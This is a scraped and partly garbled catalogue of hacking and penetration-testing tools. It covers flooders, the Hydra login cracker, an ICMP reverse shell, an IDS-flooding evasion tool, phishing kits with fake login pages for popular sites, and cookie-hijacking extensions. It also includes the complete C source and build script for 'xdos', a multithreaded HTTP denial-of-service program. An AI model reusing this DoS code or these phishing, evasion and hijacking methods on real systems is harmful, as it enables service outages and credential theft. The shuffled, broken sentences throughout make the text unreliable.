applications.net/projects/udpunicorn/ A Win32 UDP flooding/DoS (Denial of Service) utility with multithreading. Yersinia http://www.000 pps of SYN Flood (+60% of the network’s uplink) in a 1000BA SE-T Network (Gigabit Ethernet).1X Inter-Switch Link Protocol (ISL) VLAN Trunking Protocol (VTP) hotfuzz http://hotfuzz. Please note to get full ac cess to all the available tools you need to develop IPV6 tools yourself or submi t patches.

SOCKS5. SMBNT. Cisco AAA (incorporated in telnet module). MYSQL. SNMP. as every password securi ty study shows. PCNFS. LDAP3.pit file can be very difficult for inexperienced users. it is flexible and very fast.net/projects/hyenae/ Hyenae is a highly flexible platform independent network packet generator. This is wher e HotFuzz comes in handy as it requires very little knowledge about the applicat ion. Thus. Creating a . MS-SQL. ICQ. By operating as a netwo rk proxy between client and server application and performs real-time data analy sis and fuzzing. Hydra is a parallized login cracker which supports numerous protocols to attack. RLOGIN. HTTP-PROXY. We all know that Peach is capable of performing both mutation b ased and generation based fuzzing. NNTP. Postgres. comes with a clusterable remote daemon and an interactive attack assistant. LDAP2. beside that. Cisco enable. to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. hyenae http://sourceforge.thc. REXEC. SAP/R3. SMB. IMAP. Cisco auth. we can safely say that HotFuzz is also capable of the same. POP3. HTTPS. AFP. HTTP. VNC. Features * ARP-Request flooding * ARP-Cache poisoning * PPPoE session initiation flooding * Blind PPPoE session termination * ICMP-Echo flooding * ICMP-Smurf attack * ICMP based TCP-Connection reset * TCP-SYN flooding * TCP-Land attack * Blind TCP-Connection reset * UDP flooding * DNS-Query flooding * DHCP-Discover flooding * DHCP starvation attack * DHCP-Release forcing . DoS and DDoS attack scenarios.s the data before forwarding them to the fuzzed program. LDAP2. FTP. RSH. that it takes the following four steps to fuzz an app lication * * * * Configuration of the applications and the HotFuzz proxy part Recording Configuration of the fuzzing process Fuzzing hydra http://freeworld. CVS.org/thc-hydra/ A very fast network logon cracker which support many different services Number one of the biggest security holes are passwords. Currently this tool supports: TELNET. Infact it is so easy. Teamspeak. This tool is a proof of concept code. SMTP-AUTH. It al lows you to reproduce several MITM. New modules are easy to add.

google.primarily coded by Nico. When would I use inundator? inundator would be used whenever you feel there is a significant chance the atta ck you’re about to perform may be detected by the target’s intrusion detection syste m. * The master is portable across any platform that on code..* * * * * Cisco HSRP active router hijacking Pattern based packet address configuration Intelligent address and address protocol detection Smart wildcard-based randomization Daemon for setting up remote attack networks icmpsh https://github. * The target system has to be Windows because the ly for now.com/inquisb/icmpsh http://bernardodamele.com/p/natprobe/ This little. forked by me. we can know who is the gateway when we recive an respon this mac. but very usefull program. * The user running the slave on the target system e privileges. queue-driven. thus minimizing the chance of an IDS analyst detecting the real attack. A Simple Reverse ICMP Shell! The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine.. Its purpose is to anonymously flood intrusion detection systems (specifically Snort) with traffic designed to trigger false positives via a SOCKS proxy in order to obfuscate a r eal attack.blogspot.net/projects/inundator/ IDS/IPS/WAF Evasion & Flooding Tool What is inundator? inundator is a multi-threaded. inundator http://sourceforge. natprobe http://code. try to sends ICMP packet out the LAN. You would launch inundator prior to starting the attack. for example hosts that allow p2p connections.com/2011/04/reverse-connection-icmp-shell. and detect all the host that allow it. IDS evasion tool. but the d on the ethernet is the mac at the Gateway. * Client/server architecture. If we send a packet to the di macs in the lan. Whit this you can find bugs in your (company ?) network ( or others). we send the packets with IP dest of the target. Explanation When we est mac ferents se from use a Gateway. and continue running it well after you have finished the attack. Perl or Pyth slave runs on that platform on does not require administrativ . can run either C. The hope is that if your attack is detected by the IDS. the alert will be buried among several thousand false posit ives. Features * Open source software .

IP-in-IP a. For the full feature list see below . this is an wrong configuration. Ncat was written for the Nmap Project as a much-i mproved reimplementation of the venerable Netcat. Ostinato aims to be "Wireshark in Reverse" and become complementary to Wireshark . SIP. Features¶ * Runs on Windows. ICMPv4. It uses both TCP and UDP for c ommunication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users.k. This is the same. UDP.com/p/ostinato/ Ostinato is an open-source. and releases (nbquery) NetBIOS sniffing and poisoning (nbsniff) Cross-site scripting over DNS (dnsxss) DNS sniffer (dnslogger) DNS tester (dnstest) ncat http://nmap. Ncat will not only work w ith IPv4 and IPv6 but provides the user with a virtually limitless number of pot ential uses. NNTP etc..04 NetBIOS queries. It then assumes a netmask of /24 and searches all those subnets f or live IP's. BSD and Mac OS X (Will probably run on other platforms also with little or no modification but this hasn't been tested) * Support for the most common standard protocols o Ethernet/802. . registrations. ostinato http://code. Linux.. 4over4.) o More protocols in the works . It then groups all the IP addresses based on the number of hops. genera lly. IPv4. ICMPv6.google. attacks.3/LLC SNAP o VLAN (with QinQ) o ARP. nbtool http://www. Craft and send packets of several streams with different protocols at different rates.org/wiki/index. and communication.Some times we can discover more than one box configured to be an gateway. 4over6. RTSP. Features * o * * * * * DNS backdoor (dnscat) v0. and the box will response with an ICMP-Redi rect.php/Nbtool Some tools for NetBIOS and DNS investigation. nwmap http://sourceforge.a IP Tunnelling (6over4. cross-platform network packet crafter/traffic genera tor and analyzer with a friendly GUI. IPv6.skullsecurity.net/projects/nwmap/ It is a Perl script which takes a PCAP file as input and identifies valid subnet s in the same. MLD o Any text based protocol (HTTP. IGMP.org/ncat/ Ncat is a feature-packed networking utility which reads and writes data across n etworks from the command line. becouse the script only verify if the mac response. 6over6) o TCP.

g.pl/pwnat/ pwnat.eff.* Modify any field of any protocol (some protocols allow changing packet fields with every packet at run time e.org/mytoolz.dll) which should be placed in the same directory as the . pronounced "poe-nat".exe of the application for which you wanna monitor n etwork traffic. you might ask. no. or mangled packets. pwnat http://samy. Proxocket relays all packets between the application and the real Winsock DLLs. I have perso nally used localhost sockets in my applications when I have code running in diff erent processes or threads and need an effective way for them to exchange data i n an asynchronous manner (NetworkMiner does not use localhost sockets for interprocess communication though). but every relayed packet is also wri tten to a . I'm actually pretty sure many software developers use localhost sockets when they need to provide data exchange between different processes. they can run pcapdiff on the two packet capture files to identify suspicio us packets for further investigation. it also makes it possible to sniff traffic going to localhost. which can be used to cap ture calls between an application and the Winsock functions in Windows. Localhost connections are also used when running Stunnel or TOR proxies on your local machine. is a tool that allows any number of clients behind NATs to communicate with a .altervista.org/testyourisp/pcapdiff Pcapdiff is a tool developed by the EFF to compare two packet captures and ident ify potentially forged.dll and wsock32. changing IP/MAC addresses) * User provided Hex Dump . which encrypt all outgoing traffic. Two technically-inclined fr iends can set up packet captures (e. of packets * Single client can control and configure multiple ports on multiple computers g enerating traffic * Exclusive control of a port to prevent the OS from sending stray packets provi des a controlled testing environment * Statistics Window shows realtime port receive/transmit statistics and rates * Capture packets and view them (needs Wireshark to view the captured packets) * Framework to add new protocol builders easily pcapdiff http://www. Placing Luigi's prox y DLLs in the same folder as the . which reside in "C:\Windows\System32\". These DLL files act as proxies to the real Winsock DLL files (wi th the same names). proxocket http://aluigi. Proxocke t is simply two DLL files (ws2_32.g.specify some or all bytes in a packet * User defined script to substitute for an unimplemented protocol (EXPERIMENTAL) * Stack protocols in any arbitrary order * Create and configure multiple streams * Configure stream rates. dropped. bursts. L ater.exe file causes the application to load the pr oxy DLLs rather than the real Winsock DLLs.htm#proxocket Luigi Auriemma has built a great tool called Proxocket.cap file by Proxocket. Proxocket injects between application and Winsock Not only does Proxocket let you sniff the traffic to and from an application wit hout having to load a new network driver or raw socket sniffing application. But why would someon e wanna establish a network connection to localhost. You can thereby use Proxocket in order to capture the network traffic BEFORE it is encrypted by Stunnel or TO R. tcpdump or Wireshark) on their own comput ers and produce network traffic between their two computers over the Internet.

even when the client is behind a NAT. Currently there isn't any authentication or encryption .com/p/udptunnel/ Tunnels TCP over UDP packets. The controller typically listen on localhos t (port 8477) waiting for new tunnel registrations.google. this is a proxy server that works behind a NAT. rdp2tcp http://rdp2tcp. the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server.com/p/tcpjunk/ Tcpjunk is a general TCP protocols testing and hacking utility. More importantly. Runs in user space on Linux. and native Win32. The server does not need to know anything about the clients trying to connect. no UPnP/STUN/ICE required.google. without any 3rd party. Simply put. Cygwin (with IPv6 extension).org/paris/supports/2010/2010-12-14/rdp2tcp. no spoofing.net/ http://www.ossir. Main features:¶ * * * * * * * Supports IPv4/IPv6 Automatically send/receive data according to predefined session setup Client/Server mode Supports SSL Dynamic data insertion and manipulation using tags Traffic generation GUI mode udptunnel http://code. no 3rd party. tcpjunk http://code.server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Available features: * * * * tcp port forwarding reverse tcp port forwarding process stdin/out forwarding SOCKS5 minimal support The code is splitted into 2 parts: * the client running on the rdesktop client side * the server running on the Terminal Server side Once both rdp2tcp client and server are running. It uses RDP virtual channel capabilities to multiplex several ports forwarding over an alre ady established rdesktop session. There is no middle man. tunnels management is performed by the controller (on client side). no proxy. and no DNS tricks. Solaris.sourceforge.pdf rdp2tcp is a tunneling tool on top of remote desktop protocol (RDP).

char *argv[]) ${ $ if(argc != 4) { $ puts("\t\t\t\tXDOS .(LPVOID)&saddr. err_fds. $static int connect_tv(struct sockaddr_in *addr. $ $ memset(&saddr. int timeout) ${ $ int s. &tid). SOCK_STREAM. $ saddr. $ $ for(i = 1.tv_sec = timeout / 1000. $ ioctlsocket(s.sin_family = AF_INET. $static DWORD WINAPI dosmain(LPVOID p). $ if (i != SOCKET_ERROR) $ goto exit_connected.c nil A Simple HTTP DoS Tool! xdos. sizeof(saddr)). $const int main(int argc. sizeof(struct sockaddr_in)). $ $ s = socket(PF_INET.\n").dosmain. $ unsigned long tid.. $ int i. i <= atoi(argv[3]).) { $ i = connect(s. $ dosmain(&saddr)..argv[0]).xdos. &i). $ printf("Usage: %s [IP] [Port] [Threads]\n".sin_addr. $ struct sockaddr_in saddr. $ tv. $ return 0. (struct sockaddr *)addr.s_addr = inet_addr(argv[1]). $ fd_set wr_fds. $ return 1. FIONBIO.by Bull Moose\n"). i++) CreateThread(0. $ saddr. $ $ i = 1. $ } $ puts("Initiating xdos. $ $ tv. $ unsigned long i. $ if (s == 0 || s == INVALID_SOCKET) return 0.c $#define WIN32_LEAN_AND_MEAN $#include $#include $#include $unsigned long thread = 0. int timeout).0. $} $static int connect_tv(struct sockaddr_in *addr. $ saddr.0.tv_usec = 0.sin_port = (short)htons(atoi(argv[2])). $ puts("Attack sequence engaged!\n").. $ $ for (. . ''. IPPROTO_TCP). $ struct timeval tv.

$ i = WSAGetLastError(); $ if (i == WSAENOBUFS) { $ Sleep(50); $ continue; $ } $ if (i == WSAEWOULDBLOCK) $ break; $ goto exit_err; $ } $ $ FD_ZERO(&wr_fds); $ FD_SET(s, &wr_fds); $ FD_ZERO(&err_fds); $ FD_SET(s, &err_fds); $ i = select(s+1, NULL, &wr_fds, &err_fds, &tv); $ $ if (i == 0 || i == -1) $ goto exit_err; $ if (FD_ISSET(s, &err_fds) || !FD_ISSET(s, &wr_fds)) $ goto exit_err; $ $exit_connected: $ i = 0; $ ioctlsocket(s, FIONBIO, &i); $ return s; $ $exit_err: $ closesocket(s); $ return 0; $} $static DWORD WINAPI dosmain(LPVOID p) ${ $ extern unsigned long thread; $ thread++; $ $ printf("Thread number %u initiated!\n",thread); $ struct sockaddr_in addr; $ char Buffer[] = \ $ "GET / HTTP/1.1\r\n" $ "Host: 127.0.0.1\r\n\r\n"; $ SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_BELOW_NORMAL); $ int sock; $ if (p == NULL) goto ex; $ addr = *(struct sockaddr_in *)p; $ for (;;) { $ sock = connect_tv(&addr, 8); $ if (sock != 0) { $ send(sock,Buffer,strlen(Buffer),0); $ Sleep(300); $ closesocket(sock); $ } else if(sock==SOCKET_ERROR) { $ puts("Error: Socket Error.\n"); $ ExitProcess(1); $ } $ } $ex: ExitThread(0); $ return 0; $} $remove all $ befire compile

make.bat @gcc -s -O xdos.c -o xdos.exe -lws2_32 RPSS http://celnet.co.in/tools/Index.php RPSS (REMOTE PENETRATION TESTING SECURITY SHELL)IS THE EXTENSION TOOL OF YOUR SH ELL OR BASH. IT WILL ADD FEW ADITIONAL FUNCTIONALITY BASED ON SECURITY AND PENET RATION TO YOUR COMMAND SHELL. THIS TOOL WILL ACCESS THE INTERNET FROM THE COMMAN D PROMPT. BASICALLY THIS TOOL WORKE AS A BROUSER FROM COMMAND SHELL. IT WILL FAT CH SECURITY RELATED VULNARABLITY AND IT WILL DISPLAY AND STORE ITS OUTPUT IN THE SPECIFIC FILES. THIS IS POWERFUL SECURITY SHELL WHICH CAN BE PENETRATE ANY OF T HE WEB APPLICATION. IF YOU ARE EXPERIENCED HACKER OR PENETRATION TESTER THEN USI NG THIS TOOL YOU CAN MAKE YOUR PENETRATION PROCESS MORE FAST AND EASY. THIS TOOL IS COVERING ALMOST ALL THE HACKING AND PENETRATION TECHNIQUES. BASICALLY IF YOU ARE NEW IN SECURITRY WORLD AND YOU HAVE HARD DUTIES TO PENETRATE MANY WEB APPLI CATION THEN YOU CAN COMPLETE YOUR TASK IN COUPLE OF HOURS USING RPSS. Why RPSS? IF WE TALK TECHNICALLY THEN ENTIRE RPSS PROGRAMING HAS BEEN DONE USING THREAD MA NY THREAD IS BEING CREAT FOR COMPLETE ONE PROCESS. SO THE EXECUTION AND PROCESS TIME OF RPSS IS VERY FAST THEN OTHER TOOLS. THE LOGIC OF EACH TASK IS VERY UNIQU E SO IT WILL WORK AGAINST ANY OF THE TARGET. IT IS NO MATTER THAT TARGET HAS STR ONG FIREWALL, INTRUSION DETECTION SYSTEM, OR AND IP FILTARATION IS INSTALLED. RP SS WILL BY PASS ALL THE SECURITY LAYERS AND IT WILL PROVIDE YOU ACURATE RISULT. YOU CAN USE THIS TOOL FOR DIFFRENT PURPOSE SUCH AS LEGAL PENETRATION TESTING, TE STING YOUR OWN WEBAPPLICATION FOR VULNARABLITIES, FORENSIC INVESTIGATION PURPOSE , TESTING SEUCRITY COMPONENTS ETC... FUNCTION PROXY 1> Getproxy 2> Testproxylist 3> Testproxy 4> Autoproxy 5> Jumping 6> Loadproxy 7> removing 8>Changing FOOT PRINTING 9> ip getting 10> smtp address grabbing 11> tracing the rough 12> identifying technology of server (header information) 13> full server header info gathering 14> crawling emails from search engines (capability to track tricky emails too) 15> website crawling (fussing links of same directory) 16> login page finder (support for asp,aspx,php,cfm,jsp,html,htm with no of payl oads) 17> sub domain enumeration 18>host name qualification from ip range 19> web server service analysis 20> website structure fingerprinting 21> who is look up 22> reversing 23> enumerates server users 24> daemon foot printing 25> operating system foot printing

26> SSLcheck (by this task you can test ssl cipher) 27> DBcheck (by this task you can test database) 28> web server monitoring ANALYSIS 29> getting port information +service info (using thread so very fast) 30> sql injection scan 30.1-> auto scanning url 30.2->auto creating exploitable url 30.3->auto cheacking version 30.4-> auto fuzing table 31> blind injection scan 32>lfi scan 33> rfi scan 34> rce scan 35> xss scan (support HTTPS also) 36> cgi scan (more vuln paths) 37> cms scan (support joomla, membo etc…) 38> custom scan 39> full scan BRUTE FORCING 40> bruiting ftp (first will check for anonymous login) 41> bruiting smtp 42> bruiting imap 43> bruiting nntp 44> bruiting pop3 45> bruting RDP 46> Bruting rdp from ip range ENCRYPTION 47> Hashid 48> Onlinehash 49> Autohash 50> Md5 51> Sha1 52> Sha256 53> Sha384 54> Sha512 55> Base64enc 56> Base64dec SUPPORT 57> wordlist builder using custom combination 58> extracting ip addresses from files 59> extracting emails from files 60> crawling words from any of the web which is given by you 61> wget utility SERVER TASK 62> getting port information +service info (using thread so very fast) 63> sql injection scan 63.1-> auto scanning url 63.2->auto creating exploitable url 63.3->auto cheacking version 63.4-> auto fuzing table 64> blind injection scan 65> lfi scan 66> rfi scan 67> rce scan 68> xss scan (support HTTPS also) 69> cgi scan (more vuln paths) 70> cms scan (support joomla, membo etc…) 71> custom scan 72> full scan

3->auto cheacking version 74.2->auto creating exploitable url 74.andlabs.html .4-> auto fuzing table 75> blind injection scan 76>lfi scan 77> rfi scan 78> rce scan 79> xss scan (support HTTPS also) 80> cgi scan (more vuln paths) 81> cms scan (support joomla. membo etc…) 82> custom scan 83> full scan FORENSIC 84> maleware analysis 85> trojan analysis (very stupid task) 86> exe to batch 87> Fileanalysis 88> Iptrace PENTEST (WORKING ON FEW TASK) 89> Penmysql 90> Penpostgray 91> Penmssql 92> Penoracle 93> Penaccess EXPLOIT (NOT TESTED ALL) 94> Expsearch 95> Milexpgrab 96> Pacexpgrab 97> Mad 98> Boa 99> Buletftp 100> Cesarftp 101> Efs GOOGLE DORK (FEW TASK HAS PROBLEM WORKING ON IT) 102> Dorkscan 103> Subscan 104> Gvscan 105> Shellscan 106> Ranker 107> Usergrab 108> Dorkcreator 109> Cmsscan ROOT (UNDER DEVELOPMENT) 110> Bandtest 111> Flooding 112> Honeypot 113> Chat 114> Games 115> Ids 116> Automachine Social Engineering Imposter http://www.VERBOUS TASK 73> getting port information +service info (using thread so very fast) 74> sql injection scan 74.1-> auto scanning url 74.org/tools.

1.168.com/toolswatch/Social-Engineering-Ninja-v0-1-Beta.168. the inter nal DNS server of Imposter resolves all DNS queries to itself.3 * WinPcap must be installed on the system S-E Ninja http://www.com digg.com hotmail.h tml S-E Ninja is a Social Engineering tool. Data s tolen from the victim is sent back to Imposter and this is stored in a SQLite da tabase in a folder created with its name based on the date and time of the attac k. When the victim tries to access any website the domain resolves to the system ru nning Imposter and Imposter’s internal web server serves content to the victim.com gmail. De pending on the configuration appropriate payloads are sent to the victim. Available Sites: * * * * * * * * * * amazon.com onecard.com .1. The lists of attacks performed are: * Steal cookies * Set cookies * Steal Local Shared Objects * Steal stored passwords from FireFox * Steal cached files * Poison browser cache * Steal files from the victim’s local file system through Internet Explorer * Run SQL queries on the victim’s Google Gears database and transfer the results * Create ResourceStore and Managed ResourceStore on the victim’s Google Gears Loca lServer General Requirements: * Administrative Rights: Reasons: o Imposter listens on ports 53/UDP and 80/TCP o The ’File Stealer’ module runs an internal sniffer * System running Imposter should have the IP address 192. with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP.security-database.com (hotmail) myspace.EN Langs) paypal.com ebuddy.3 Reasons: o Internal DNS server resolves all domains to 192.com msn. Once the s ystem running Imposter is configured as the DNS server to the victims.Imposter is a flexible framework to perform Browser Phishing attacks.com facebook.com (AR.

EN Langs) twitter. After the user selects a targeted video device to attack in an ongoi ng video session. Then VideoJak creates a custom video payload by changing the sequence num bers and timestamp values used in the original RTP packets between the two video endpoints. intercept and modify requests.com/images/seninja. This attack results in one of several new features: Web Andiparos http://code.com yahoo. You can send an anonymous message using PHP mail() Function /[SENINJA]/admin/mai l and you can get your victim ip put it in the database"/[SENINJA]/ip/" Download from http://brokenpixel.net/ VideoJak is an IP Video security assessment tool that can simulate a proof of co ncept video interception or replay test against a targeted. coll ecting the RTP sequence numbers and timestamp values used between the video endp oints. * IP. VideoJak is the first of its kind security tool that analyzes video cod ec standards such as H. VideoJak analyzes the RTP packets. * Mailer. It’s main purpose is to augment and simulate social-engineering attacks and allow the tes ter to effectively test how a targeted attack may succeed. etc. analyze content. user-selected video session. Some useful features of UCSniff that have been combined together into a si ngle package: Videojak http://videojak.com youtube. malicious page gives you the ip address of victim. under the GPLv3 lic ense.sourceforge. Next.com Features: * Fakepages.com/p/andiparos/ Andiparos is a fork of the famous Paros Proxy. the software is free and available for anyone to download. .google.264.org/resources/set. It is an open source web applicat ion security assessment tool that gives penetration testers the ability to spide r websites.* * * * travian.zip Social Engineering Toolkit http://www.social-engineer.sourceforge.com (AR.” VOIP UCSniff http://ucsniff. Written in C/C++. allowing VoIP and IP Video own ers and security professionals to rapidly test for the threat of unauthorized Vo IP and Video Eavesdropping.net/ UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing o pen source software into several useful features.html “The Social Engineering Toolkit (SET) is a python-driven suite of custom tools whi ch solely focuses on attacking the human element of penetration testing. VideoJak works by first capturing the RTP port used in a video conversation or stream. and available on Linux and Windows . VideoJak delivers the payload over the learned RTP port agains t the target.

. Local DNS cache limits name resolution queries. UI abstraction. making the life eas ier for penetration testers. User Agent spoofing. Features of Arachni: * * * * * * * * * * * * * * * * * Provide a stable and efficient framework Be simple Cookie-jar support SSL support. * URL exclusion filter based on regular expressions. Custom output lib. catalogs. * Adjustable depth limit. Proxy support for SOCKS and HTTP(S).com/Zapotek/arachni {Arachni} is a feature-full and modular Ruby framework that allows penetration t esters and administrators to evaluate the security of web applications. it trains itself with every HTTP response it receives during the audit process. * Interrupts pause the system. This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni. * URL inclusion filter based on regular expressions. The HTML Analyzer provided by Arachni provides the following functions: . Arachni http://github.The advantage of Andiparos is mainly the support of Client Certificates on Smart cards. The Website Crawler included with Arachni has the following features: The crawler is provided by Anemone with some slight modifications to accommodate extra features. * Adjustable link count limit. * Stays in domain by default and it’ll probably stay that way. * Can optionally follow subdomains. Unlike other scanners. Proxy authentication. {Arachni} is smart.. Metasploit style. Site authentication. Allows to run the modules after site analysis has concluded. * Traps Ctrl-C interrupt. * Multi-threaded with adjustable thread count. * Adjustable redirect limit. Only {Arachni::UI::CLI} for the time being but WebUI & GUI are relatively easy to implement now. the user then has the option to either resume or exit. * Filters for redundant pages like galleries. Moreover it has several small interface enhancements. Highlighted command line output. Run mods last option. Arachni takes into account the dynamic nature of web appl ications and can detect changes caused while travelling through each path of a web application's cyclomatic complexity. SOCKS support is kindly provided by socksify. etc based on regular exp ressions and counters. The system uses its own print wrappers to output messages.

net/ The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations again st precomputed hashes for versions of those files in all all available releases. so n o IDE required * Cross platform * Open source * No separate db to install and configure . non-invasive.it uses an 'in memory' db that is au tomatically (re)initialized on start up All you need to do is download and open the zip file.krakowlabs. generic. Tomcat * Self contained (no additional dependencies other than to 2 in the above line) * Easy to change on the fly .g. I'd recommend the Zed Attack Proxy (for which I'm the project lead).Can extract and analyze: * Forms * Links * Cookies BlindElephant http://blindelephant. e. low-bandwidth. bf3 creates test cases in a numbered system. Fuzzing is automat ed through the browser using the refresh method. BodgeIt Store https://code. the module s it uses are extendable but also highly integrated into the core. Then point your browser at (for example) http://localhost:8080/bodgeit You may find it easier to find vulnerabilities using a pen test tool. Some of its features and characteristics: * Easy to install . If error is detected. and then extract the war f ile into the webapps directory of your favorite servlet engine. After initialization. The Bodge It Store include the following significant vulnerabilities: * * * * * * * Cross Site Scripting SQL injection Hidden (but unprotected) content Cross Site Request Forgery Debug code Insecure Object References Application logic vulnerabilities Browser Fuzzer http://www.com/p/bodgeit/ The BodgeIt Store is a vulnerable web application which is currently aimed at pe ople who are new to pen testing. If you dont have a favourite one. The technique is fast. bf3 can be us ed via command line to set all necessary flags for each fuzzing operation.sourceforge.com/dev. server lo .just requires java and a servlet engine.google.all the functionality is implemented in JSPs.html Browser Fuzzer 3 is designed as a hybrid framework/standalone fuzzer. and highly automat able.

ups tream proxies.uk/resources/tools/cat/ CAT is designed to facilitate manual web application penetration testing for mor e complex. driving numerous individual tool actio ns. * Suite-level target scope configuration. DOM. Features Fuzzes CSS. * Fully fledged web vulnerability scanner.engineeringforfun.contextis. [Pro version only] * FIPS-compliant statistical analysis of session token randomness. authentication. persistence. * Extensibility via the IBurpExtender interface. alerting and extensibility. * A range of engagement tools. a nalyse. It removes some of the more repe . [Pro version only] * Suite-wide search function. HTML. Burp Suite allows you to combine manual and automated techniques to enumerate. logging. Its purpose is to prove the impact of this vulnerability during a vulnerabi lity assessment. [Pro version only] * Ability to save and restore state. with a ll requests originating from the user's browser. [Pro version only] * Support for custom client and server SSL certificates. Key features unique to Burp Suite include: * Detailed analysis and rendering of requests and responses. web and proxy authenticati on. It contains all of the Burp tools with numerous interfaces between them designed to facilit ate and speed up the process of attacking an application. The various Burp tools work t ogether effectively to share information and allow findings identified within on e tool to form the basis of an attack using another. CAT http://www.gs can provide insight to the offending test case. to make your work faster and more effective. Burp Suite http://portswigger. * One-click transfer of interesting requests between tools. * Site map showing information accumulated about target applications in tree and table form. * Tools can run in a single tabbed window. demanding application testing tasks. All tools share the sa me robust framework for handling HTTP requests. * Utilities for decoding and comparing application data. scan. * Runs in both Linux and Windows. * Centrally configured settings for upstream proxies.com/ BrowserRider is a framework built to exploit the cross site scripting vulnerabil ity. or be detached in individual windows.co. * Ability to "passively" spider an application in a non-intrusive manner. and logging.net/suite/ Burp Suite is an integrated platform for attacking web applications. attack and exploit web applications. JavaScript and XML Attended and Unattended Fuzzing Modes 7th Generation Fuzzing Oracle Random Data Generator Mutation Fuzzing Engine Browser Rider http://www.

co. Unicode.org/projects/cewl. Hex . There are a number of differences between CAT and currently available web proxie s. but CAT provides a richer feature set and greater performance. They include: CAT uses Internet Explorer’s rendering engine for accurate HTML representation It supports many different types of text conversions including: URL.contextis. allowing the tester to focus on individu al applications. ClickjackingTool http://www. Concep tually it is similar to other proxies available both commercially and open sourc e. In pa rt. Although it has been two years since the concept was first introduced. This new browser-based tool allows a user to experiment with clickjacking techni ques by using point-and-click to visually select different elements within a web page to be targeted. SQL and JavaScript no quotes It offers integrated SQL Injection and XSS Detection Synchronised Proxies for Authentication and Authorisation checking Faster performance due to HTTP connection caching SSL Version and Cipher checker using OpenSSL Greater flexibility for importing/exporting logs and saving projects Tabbed Interface allows for multiple tools at once e.titive elements of the testing process. most webs ites still have not implemented effective protection against clickjacking. The tool also allows several 'next-generation' clickjacking techniques to be used. Base64. and returns a list of words which can then be used for password crackers such as John the Ripper.g.uk/resources/tools/clickjacking-tool/ Clickjacking Tool Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen i n 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible i frame. Among the features of the new tool are: * Use point-and-click to select the areas of a page to be targeted * Supports the new 'text-field injection' technique * Supports the new 'content extraction' technique * 'Visible mode' replay allowing a user to see how the technique works behind th e science * 'Hidden mode' replay allows the same steps to be replayed in a hidden manner. CeWL is p ronounced "cool".php CeWL (Custom Word List generator) is a ruby app which spiders a given url to a s pecified depth. combined with a more intuitive user interface. optionally following external links. multiple repeaters & dif ferent logs The ability to repeat and modify a sequence of requests (particularly useful in SSO testing) It’s free! Cewl http://www. as introduced in Paul Stone's Blackhat Europe 2010 talk. thus enabling them to conduct a much more thorough test. this may be because of the difficulty of visualising how the technique works in practice.digininja. . simulating a real clickjacking attack. HTML/XML.

On an open w ireless network. and works best in Firefox 3.net/toolz/ddpwn/ * Detects Directory traversal vulnerabilities on remote HTTP/FTP server systems.local file inclusion. so it's assumed that the tested systems are Windows based HTTP/FTP servers. Darkjumper http://sourceforge. Use the -update f lag to perform an online fresh update. cookies are basically shouted through the air. but surprisingly uncommon for websites to encrypt everything else.6. HTTP session hijacking (someti mes called "sidejacking") is when an attacker gets a hold of a user's cookie.blogspot.ini on the vulnerable systems through Di rectory traversal vulnerabilities. pleas e see the Readme. This leaves the cookie (and the user) vulnerable.com/ A simple perl tool which detects several Directory Traversal Vulnerabilities on HTTP/FTP Servers. CGI and Path Scanning. 4.com/firesheep/ Firefox extension that demonstrates HTTP session hijacking attacks When logging into a website you usually start by submitting your username and pa ssword. Proxy added 8. Auto-bruteforcing after user enumeration 6. For further information. * Currently. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server. replies back to you with a "cookie" which is used by your browse r for all subsequent requests.remote file inclusion and blind s ql injection on every site at the same server. 2. It's extremely common for websites to protect your password by encrypting the in itial login.net/projects/darkjumper/ Darkjumper.The tool is currently in an early beta stage. Port-scanning 5. * DotDotPwn checks the presence of boot.sectester.py Developed by : mywisdom & gunslinger_ This tool will try to find every website that host at the same server at your ta rget Then check for every vulnerability of each website that host at the same se rver Functions of darkjumper: 1. . 3. the traversal database holds 881 attack payloads. Scan for sql injection. al lowing them to do anything the user can do on a particular website. Verbocity added 9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not. Auto-injector – auto column finder (mysql) if found mysql bug found 7. Firesheep http://codebutler. The server then checks to see if an account matching this information ex ists and if so. Ful l support for other browsers will follow shortly. DotDotPwn http://dotdotpwn. making these att acks extremely easy.github. This AttackDB version currently has: 871 traversal payloads (a nd counting!). http://chr1x.txt file in the downloadable tool.

It allows you to manipulate the web application’s user interface to eliminate annoying limitations and client-side con trols that interfere with the web application penetration test. clear & also option to select to see requests and/or responses .erratasec.Added 3 new file extension fuzzers (thnx Adam) The components of JBroFuzz are all integrated into a single window and can be ac cessed through individual tabs. in the Encoder Window. My hope is that Firesheep will help the users win.1): .Request Text P anel Added a standalone jbrofuzz-core-2.Added ASCII 85 (045-A85-RFC) & printable ASCII 94 (046-A94-CHR) fuzzers. Hamster http://hamster. plus friends Encoder/Hash is now also a standalone jar/exe file Added right click encode/decode functionality in the Fuzzer tab .com/ Hamster is a tool for HTTP session hijacking with passive sniffing. They've been ignoring this responsibility for too long. capturing the session cookies. open source. File -> Open. importing them into the browser to allow you to hijack their session! HTTP session hijacking or SideJac king is where you hijack a existing Web session with a remote service by interce pting and using the credentials (normally session cookies) that identified the u ser to that specific server.net/projects/jbrofuzz/files/ JBroFuzz is a web application fuzzer for requests being made over HTTP and/or HT TPS. JBroFuzz http://sourceforge.jbrf file . Release Notes (2. and is available now for Mac OS X and Windows. make su re you know what you are fuzzing! .3.Ctrl + M to load your own fuzzers from a . Websites have a responsibility to protect the people who depend on their service s.org/ Groundspeed is an open-source Firefox extension for web application security tes ters presented at the OWASP AppSec DC 2009. under: Pre ferences -> Directory Locations Keep History of previous dir in: File -> Save. These tabs are: .Firesheep is free.On The Wire: Right-click. File -> Save As Fixed find functionality when viewing fuzzing responses (thx Markus!) Added a swap button. . Groundspeed http://groundspeed.wobot. .Base32 and zBase32 